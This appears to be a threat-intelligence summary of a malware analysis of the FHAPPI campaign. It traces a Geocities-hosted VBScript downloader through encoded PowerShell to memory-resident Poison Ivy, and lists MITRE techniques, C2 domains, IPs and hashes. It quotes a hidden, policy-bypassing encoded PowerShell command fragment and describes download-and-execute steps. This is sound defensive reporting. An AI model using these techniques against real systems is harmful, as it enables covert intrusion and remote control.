FHAPPI is an APT campaign that used Geocities hosting to deliver a VBScript-based downloader which then loads PowerShell-encoded payloads to install Poison Ivy. The analysis traces a multi-stage infection—from Geocities-hosted VBScript to PowerShell, a PowerSploit PoC, and memory-resident Poison Ivy with C2 traffic—highlighting its fileless, multi-encoded delivery chain. #FHAPPI #PoisonIvy #PowerSploit #GeocitiesJP #VBScript #Shellcode
Keypoints
- FHAPPI is a pivoted APT campaign using Geocities Japan accounts to host malicious samples.
- An APT phishing email linked to a Geocities-hosted downloader initiates the infection.
- The hosted sample is a VBScript-encoded script that decodes and spawns PowerShell commands.
- The PowerShell sequence downloads and executes additional payloads (a .doc and a .ps1) via base64-encoded commands and IEX.
- The main payload is a Poison Ivy shellcode injected into a fake userinit.exe process, with multi-layered encoding and memory-only execution.
- C2/network traffic reveals a domain (outlooksysm.net) and a South Korea-based IP (61.97.243.15) used for callback and control.
- The campaign was mitigated through coordinated takedowns and analysis efforts, leading to FHAPPI being named and described publicly.
MITRE Techniques
- [T1566.001] Phishing – “VXRL(credit) contacted us regarding an APT phishing email that included a download link to a malware being hosted on a Geocities website.”
- [T1059.005] Visual Basic – “The contents of the hosted malware file was VBScript encoded script.”
- [T1059.001] PowerShell – “powershell.exe -w hidden -ep bypass -Enc “etc etc etc”.”
- [T1105] Ingress Tool Transfer – “This script creates a web client object and uses the proxy setting and user rights to download a file from a url and execute the file.”
- [T1027] Obfuscated/Compressed Files and Information – “multilayered base64 encoding is original to this sample.”
- [T1055] Process Injection – “Poison Ivy shellcode during injection of the userinit.exe process was direct/undirectly involved in loading the necessary DLLs in the kernel space.”
- [T1071] Web Protocols – “The CNC and Network Traffic… hostname and IP address for the callback” and “Hostname: web.outlooksysm.net”.”
Indicators of Compromise
- [Domain] Geocities.jp domain – vbiayay1 – used to host the malware sample
- [IP] 61.97.243.15 – a dial-up IP used as a Poison Ivy CNC/C2 endpoint
- [IP] 61.97.243.0/24 – broader range associated with the CNC context
- [Domain] outlooksysm.net – C2 domain used for callbacks; WHOIS details included
- [Hash] MD5 – 0011fb4f42ee9d68c0f2dc62562f53e0, b862a2cfe8f79bdbb4e1d39e0cfcae3a, and 7 more hashes
- [File] Meeting_sumxx.doc and Meeting_xxx.doc – sample document names tied to the campaign
Read more: https://blog.malwaremustdie.org/2024/06/mmd-068-2024-english-report-of-fhappi.html